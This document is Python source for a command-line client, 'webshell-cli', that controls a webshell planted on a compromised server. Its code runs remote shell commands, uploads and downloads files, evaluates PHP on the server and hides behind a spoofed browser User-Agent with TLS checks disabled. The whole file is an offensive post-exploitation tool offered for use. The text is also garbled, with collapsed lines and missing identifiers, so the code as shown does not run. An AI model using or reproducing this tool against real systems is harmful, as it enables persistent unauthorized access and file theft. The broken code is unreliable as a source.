import re import sys import uuid import shlex import base64 import pathlib import requests import argparse from os.path import normpath from typing import Union, Callable from prompt_toolkit import prompt from prompt_toolkit.styles import Style from prompt_toolkit.lexers import PygmentsLexer from import BashLexer, BatchLexer from prompt_toolkit.history import History, InMemoryHistory, FileHistory from requests.packages.urllib3.exceptions import InsecureRequestWarning from http import cookiejar # Python 2: import cookielib as cookiejar class BlockAll(cookiejar.CookiePolicy): return_ok = set_ok = domain_return_ok = path_return_ok = lambda self, *args, **kwargs: False netscape = True rfc2965 = hide_cookie2 = False style = Style.from_dict({ 'username': '#33cc33', 'host': '#33cc33', 'path': '#666699', }) class InternalError(Exception): ''' Internal error. Non recoverable. ''' class ServerError(Exception): ''' Server returned unexpected status code. ''' class InvalidDirectoryException(Exception): ''' When the user attempted to change into an invalid server directory. ''' class ParameterCountException(Exception): ''' When the application server returned unexpected output. ''' class PatternNotFoundException(Exception): ''' When the webshell pattern cannot be found within the output. ''' class InvalidProtocolException(Exception): ''' When the user specified URL uses an invalid protocol. ''' class InvalidHeaderException(Exception): ''' When the user specified an invalid HTTP header. ''' def prepare_url(url: str) -> str: ''' Parses the user specified URL and adds an HTTP prefix if required. Parameters: url user specified URL Returns: url prepared URL ''' try: protocol, rest = url.split(':/', 1) if protocol not in ['https', 'http']: raise InvalidProtocolException(f'Unsupported protocol: {protocol}') return url except ValueError: return f'http://{url}' def b64(data: Union[str, bytes, pathlib.PurePath]) -> str: ''' Takes a string, bytes or a path and encodes it into base64. Parameters: data data to encode Returns: str base64 encoded string ''' if type(data) == str: data = data.encode() elif issubclass(type(data), pathlib.PurePath): data = str(data).encode() return base64.b64encode(data).decode() def b64d(data: Union[str, bytes]) -> bytes: ''' Takes a string or bytes representing base64 content and decodes it. Parameters: string base64 string to decode Returns: bytes data decoded from the base64 ''' if type(data) == str: data = data.encode() return base64.b64decode(data) def print_help() -> None: ''' Prints a help message on actions that are available within a shell. Parameters: None Returns: None ''' offset = 30 print('usage:') print('') print(' '.ljust(offset), 'execute the specified command') print(' cd '.ljust(offset), 'change the current working directory') print(' !background '.ljust(offset), 'execute the specified command in the background') print(' !download []'.ljust( offset), 'download a remote file from the server') print(' !upload []'.ljust( offset), 'upload a local file to the server') print(' !get []'.ljust(offset), 'alias for download') print(' !put []'.ljust(offset), 'alias for upload') print(' !eval '.ljust(offset), 'evaluate a local file on the server (only when php)') print(' !env [=]'.ljust( offset), 'set an environment variable') print(' !help'.ljust(offset), 'show this help menu') def check_shell(shell: str) -> None: ''' Checks whether the specified shell contains invalid characters. Parameters: shell The user specified shell Returns: None ''' if shell and ("'" in shell or '"' in shell): print('[-] Error: The value specified by --shell cannot contain quotes.') sys.exit(1) def print_result(result: str) -> None: ''' Helper function that prints the result of an operation. It checks whether the result already ends with a newline and does not print an additional newline if this is the case. Parameters: result result to print Returns: None ''' if not result: return if result[-1] == '\n': print(result, end='') else: print(result) class Webshell: ''' The webshell class is used to interact with a webshell. ''' action = 'action' pattern = 'pattern' cmd_param = 'b64_cmd' env_param = 'b64_env' back_param = 'back' orig_param = 'b64_orig' chdir_param = 'chdir' upload_param = 'b64_upload' filename_param = 'b64_filename' cmd_action = 'cmd' init_action = 'init' eval_action = 'eval' upload_action = 'upload' download_action = 'download' def __init__(self, url: str, shell: str, pattern: str, username: str, password: str, headers: str,debug:str,block_cookie:str) -> None: ''' Initializes a webshell object. The only really required parameter is the URL the webshell is reachable on. The shell parameter can be optionally specified (set to None otherwise) to use a specific shell command on the server side. Parameters: url The URL of the webshell shell Shell command to use on the server side pattern Optional pattern to find the shell response username Username to use for basic authentication password Password to use for basic authentication headers Additional HTTP headers Returns: None ''' self.url = url = shell self.env = {} self.user = None self.type = None = None self.path = None self.debug = debug self.posix = None self.path_func = None self.block_cookie = block_cookie self.pattern = pattern if pattern is not None else uuid.uuid4().hex self.regex = re.compile( re.escape(self.pattern) + '(.+)' + re.escape(self.pattern)) requests.packages.urllib3.disable_warnings(InsecureRequestWarning) self.session = requests.Session() if self.block_cookie: self.session.cookies.set_policy(BlockAll()) self.session.headers.update( {'User-Agent': 'Mozilla/5.0 (Linux; Android 11; 21061119AG Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/108.0.5359.128 Mobile Safari/537.36'}) if username is not None and password is not None: self.session.auth = (username, password) try: for header in headers: key, value = header.split(':', 1) self.session.headers.update({key: value.strip()}) except ValueError: raise InvalidHeaderException( f'The specified header value {header} is invalid.') self.init() def init(self) -> None: ''' Obtains the current username, hostname and path from the application server. Parameters: None Returns: None ''' data = { Webshell.action: Webshell.init_action, Webshell.pattern: self.pattern, } if self.debug: print(data) response =, data=data, verify=False) if self.debug: print(response.text) result = self.get_response(response, 'init') sep, self.type, self.user,, self.path = self.get_values( result, 5, True, False) if sep == '\\': self.posix = False self.path_func = pathlib.PureWindowsPath if is None: = 'cmd.exe /c' else: self.posix = True self.path_func = pathlib.PurePosixPath if is None: = '/bin/sh -c' self.path = self.path_func(self.path) = '<@:SEP:@>'.join( + '<@:SEP:@>' def add_env(self, cmd: str) -> None: ''' Add a new environment variable. Parameters: cmd command that contains the environment varibale Returns: None ''' if not cmd.startswith('!env'): raise InternalError('env was called despite !env not used.') if cmd.strip() == '!env': print('[+] Currently set environment variables:') for key, value in self.env.items(): print(f'[+] {key}={value}') return elif cmd.strip() == '!env clear': self.env = {} print('[+] Environment variables were cleared.') return try: _, spec = cmd.split(' ', 1) key, value = spec.split('=', 1) except ValueError: return f'[-] The specified variable defintion is invalid: {cmd}' if value: self.env[key] = value else: self.env.pop(key, None) return f'[+] Set environment variable: {key}={value}' def get_env(self) -> str: ''' Return the currently set environment variables as base64 strings separated by :. Parameters: None Returns: str base64 encoded environment variables ''' return_value = '' for key, value in self.env.items(): return_value += b64(f'{key}={value}') + ':' return return_value[0:-1] def issue_command(self, cmd: str, background: bool = False) -> str: ''' Sends the specified command to the webshell and returns the output of it. If background is set to true, the output is not awaited. Parameters: cmd Command to execute background Execute as background command Returns: result Command result (if background was not used) ''' data = { Webshell.action: Webshell.cmd_action, Webshell.back_param: background, Webshell.cmd_param: b64(f'{}{cmd}'), Webshell.chdir_param: b64(self.path), Webshell.env_param: self.get_env(), Webshell.pattern: self.pattern, } if background: if not cmd.startswith('!background'): raise InternalError( 'background was called despite !background not used.') _, cmd = cmd.split(' ', 1) data[Webshell.cmd_param] = b64(f'{}{cmd}') try:, data=data, timeout=0.0000000001, verify=False) except requests.exceptions.ReadTimeout: pass else: if self.debug: print(data) response =, data=data, verify=False) if self.debug: print(response.text) result = self.get_response(response, 'issue_command') result, self.path = self.get_values(result, 2, True) return result def eval(self, cmd: str) -> str: ''' Parses the local filename from the eval command and sends the file content to the server. The content is then used within an eval statement. This function can only be called within php shells. Parameters: cmd eval command containing the local script name Returns: None ''' if not cmd.startswith('!eval'): raise InternalError('eval was called despite !eval not used.') if self.type != 'php': return '[-] !eval can only be used in a php shell.' _, path = cmd.split(' ', 1) path = pathlib.Path(path) try: content = path.read_text() content = content.strip('') except Exception: return f'[-] Unable to read local file {path.absolute()}.' data = { Webshell.action: Webshell.eval_action, Webshell.chdir_param: b64(self.path), Webshell.env_param: self.get_env(), Webshell.upload_param: b64(content), Webshell.pattern: self.pattern, } response =, data=data, verify=False) self.get_response(response, 'eval') return f'[+] {path.absolute()} was evaluated by the server.' def change_directory(self, cmd: str = None) -> str: ''' Attempts to change the working directory. This function sends the requested directory change to the server and attempts to validate it. If the directory is valid, the new absolute path is returned. If it is invalid, an empty response is returned. Parameters: cmd cd command. Needs to start with cd. Returns: cwd Current working directory on the server side ''' if not cmd.startswith('cd'): raise InternalError( 'change_directory was called despite cd not used.') try: _, path = cmd.split(' ', 1) except ValueError: raise ValueError('Usage: cd ') if not self.path_func(path).is_absolute() and self.path is not None: path = self.path.joinpath(path) data = { Webshell.chdir_param: b64(normpath(path)), Webshell.pattern: self.pattern, } response =, data=data, verify=False) result = self.get_response(response, 'change_directory') self.path = self.get_values(result, 1, True)[0] def upload_file(self, cmd: str) -> str: ''' Expects command to be of the form '!upload|put []' and uploads to on the server. If was not specified, the original filename is kept and the file is uploaded to the current working directory. Parameters: cmd File upload command Returns: result Success or Failure ''' if not (cmd.startswith('!upload') or cmd.startswith('!put')): raise InternalError( 'upload_file was called despite neither !upload nor !put was used.') try: (lfile, rfile) = self.get_files(cmd, pathlib.Path, self.path_func) except ValueError: return '[-] !upload ' if not lfile.is_file(): return f'[-] Local file {lfile} does not exist' if not rfile.is_absolute(): rfile = self.path.joinpath(rfile) content = lfile.read_bytes() request_data = { Webshell.action: Webshell.upload_action, Webshell.upload_param: b64(content), Webshell.filename_param: b64(rfile), Webshell.chdir_param: b64(self.path), Webshell.orig_param: b64(, Webshell.pattern: self.pattern, } response =, data=request_data, verify=False) self.get_response(response, 'upload_file') return f'[+] Uploaded {len(content)} Bytes to {rfile}' def download_file(self, cmd: str) -> str: ''' Expects command to be of the form '!download|get []' and downloads to on the local system. If was not specified, the original filename is kept and the file is downloaded to the current working directory. Parameters: cmd File download command Returns: result Success or Failure ''' if not (cmd.startswith('!download') or cmd.startswith('!get')): raise InternalError( 'download_file was called despite neither !download nor !get was used.') try: (rfile, lfile) = self.get_files(cmd, self.path_func, pathlib.Path) except ValueError: return '[-] !download ' if not rfile.is_absolute(): rfile = self.path.joinpath(rfile) request_data = { Webshell.action: Webshell.download_action, Webshell.filename_param: b64(rfile), Webshell.chdir_param: b64(self.path), Webshell.pattern: self.pattern, } response =, data=request_data, verify=False) result = self.get_response(response, 'download_file') content, _ = self.get_values(result, 2, False) try: if content: lfile.write_bytes(content) return f'[+] Saved {len(content)} Bytes to {lfile.absolute()}.' else: return '[-] Skipping download of empty (probably not existing) file.' except Exception: return f'[-] Unable to write file {lfile.absolute()}.' def get_values(self, data: str, count: int, decode: bool = False, path: bool = True) -> list: ''' Expects a string of colon separated base64 strings. Decodes each string and returns it within a list. If the number of decoded strings does not match the expected count, raises an exception. The last part of the incoming data usually expected to be a path and is wrapped into a Path object. If this behavior is not desired, the path parameter should be set to false. Parameters: data colon separated base64 strings count expected count of arguments decode Whether to decode bytes to string path Whether to interpret the last item as path Returns: list list containing the decoded values ''' return_value = [] split = data.split(':') if len(split) != count: raise ParameterCountException( f'Obtained an insufficient amount of parameters: {len(split)}') for item in split: if decode: result = b64d(item).decode() else: result = b64d(item) return_value.append(result) if decode and path: return_value[-1] = self.path_func(return_value[-1]) return return_value def get_response(self, response: requests.Response, action: str) -> str: ''' Extracts the HTTP response text and handles some common errors. The status code 202 is expected to be returned if the requested directory does not exist on the server side. It is required to choose a non-error HTTP status for this purpose, as in the case of HTTP error status codes, the response text is sometimes supressed. Parameters: response HTTP response to a webshell-cli request action The currently executed action Returns: str extracted response text ''' if response.status_code != 200 and response.status_code != 202: message = f'HTTP status code for {action}: {response.status_code}' message += ' - Server response:\n' + response.text if response.text else '' raise ServerError(message) result = if not result: raise PatternNotFoundException( f'Pattern {self.pattern} was not found in the server output.') if response.status_code == 202: message = b64d(result.groups(1)[0]).decode() raise InvalidDirectoryException(message) return result.groups(1)[0] def get_files(self, cmd: str, path_func1: Callable, path_func2: Callable) -> tuple: ''' This helper function is used to extract filenames from !upload or !download calls. It simply uses shlex to parse the filenames and returns them as a tuple. The filenames are returned as paths. The kind of paths that is expected (WindowsPath, PosixPath) needs to be specified. Parameters: cmd Upload or Download command path_func1 Path type of the first file path_func2 Path type of the second file Returns: files Tuple containing the filenames ''' split = shlex.split(cmd, posix=self.posix) length = len(split) if length < 2: raise ValueError('[-] Syntax error.') if length == 2: file1 = path_func1(split[1]) file2 = path_func2( else: file1 = path_func1(split[1]) file2 = path_func2(split[2]) return (file1, file2) def cmd_loop(self, history: History) -> None: ''' Starts an infinite loop that constantly asks the user for new commands. Parameters: history The prompt_toolkit history to use for the shell Returns: None ''' while True: try: prompt_str = [ ('', '['), ('class:username', self.user), ('', '@'), ('class:host',, ('', ' '), ('class:path', str(self.path)), ('', ']$ ') ] lexer = BashLexer if self.posix else BatchLexer cmd = prompt(prompt_str, history=history, lexer=PygmentsLexer(lexer), style=style) result = self.handle_cmd(cmd) print_result(result) except KeyboardInterrupt: print('[-] Aborted.') except ParameterCountException: print( '[-] Server response contained an unexpected amount of parameters.') except (ValueError, InvalidDirectoryException) as e: print(f'[-] {e}') except ServerError as e: print('[-] The specified action caused an server error.') print(f'[-] Error: {e}') except EOFError: print('[-] EOF.') sys.exit(1) except InternalError as e: print(f'[-] An internal error occured: {e}') sys.exit(1) def handle_cmd(self, cmd: str) -> str: ''' Handles the cmd specified during a loop iteration. Parameters: cmd command specified during the iteration Returns: result command result ''' if cmd.startswith('!env'): return self.add_env(cmd) elif cmd.startswith('!eval'): return self.eval(cmd) elif cmd.startswith('!upload') or cmd.startswith('!put'): return self.upload_file(cmd) elif cmd.startswith('!download') or cmd.startswith('!get'): return self.download_file(cmd) elif cmd.startswith('!background'): return self.issue_command(cmd, True) elif cmd.startswith('cd'): return self.change_directory(cmd) elif cmd.startswith('help') or cmd.startswith('!help'): print_help() elif cmd.strip() == 'exit': sys.exit(0) elif cmd: return self.issue_command(cmd) history = str(pathlib.Path.home().joinpath('.webshell_cli_history')) parser = argparse.ArgumentParser( description='''webshell-cli v1.1.0 - A simple command line interface for webshells''') parser.add_argument('url', help='url of the webshell') parser.add_argument('-m', '--memory', action='store_true', help='use InMemoryHistory instead of FileHistory') parser.add_argument('-f', '--file-history', metavar='file', default=history, help=f'history file (default: {history})') parser.add_argument('-s', '--shell', metavar='shell', help='use the specified shell command (e.g. "powershell -c")') parser.add_argument('--pattern', metavar='pattern', help='pattern to identify webshell output (default: random)') parser.add_argument('-u', '--username', metavar='user', help='username for basic authentication') parser.add_argument('-p', '--password', metavar='pass', help='password for basic authentication') parser.add_argument('-d', '--debug', metavar='debug', help='enable debug output (e.g. "-d true")') parser.add_argument('-b', '--block_cookie', metavar='bcookie', help='block all cookie (e.g. "-b true")') parser.add_argument('-H', '--header', metavar='header', nargs='*', default=[], help='additional HTTP headers') args = parser.parse_args() # print(args) check_shell( debug = False block_cookie = False try: if args.memory: history = InMemoryHistory() else: fh = open(args.file_history, 'a') fh.close() history = FileHistory(args.file_history) url = prepare_url(args.url) if args.debug != None: debug = True if args.block_cookie != None: block_cookie = True webshell = Webshell(url,, args.pattern, args.username, args.password, args.header,debug=debug,block_cookie=block_cookie) webshell.cmd_loop(history) except ServerError as e: print(f'[-] Caught ServerError. Webshell at {args.url} is not functional.') print(f'[-] Error: {e}') except ParameterCountException: print('[-] Server response contained an unexpected amount of parameters.') print(f'[-] Webshell at {args.url} is not functional.') except PatternNotFoundException as e: print('[-] Caught PatternNotFoundException while parsing server response.') print(f'[-] Error: {e}') except InvalidHeaderException as e: print('[-] Caught InvalidHeaderException while preparing request.') print(f'[-] Error: {e}') except IsADirectoryError as e: print('[-] The specified filename is an existing directory:') print(f'[-] {e}') except PermissionError as e: print('[-] Insufficient permissions to access the specified resource:') print(f'[-] {e}') except FileNotFoundError as e: print('[-] The specified file (or parent directory) was not found:') print(f'[-] {e}') except (ValueError, InvalidProtocolException) as e: print(f'[-] {e}') except requests.exceptions.ConnectionError as e: print('[-] Cannot connect to the specified target:') print(f'[-] {e}')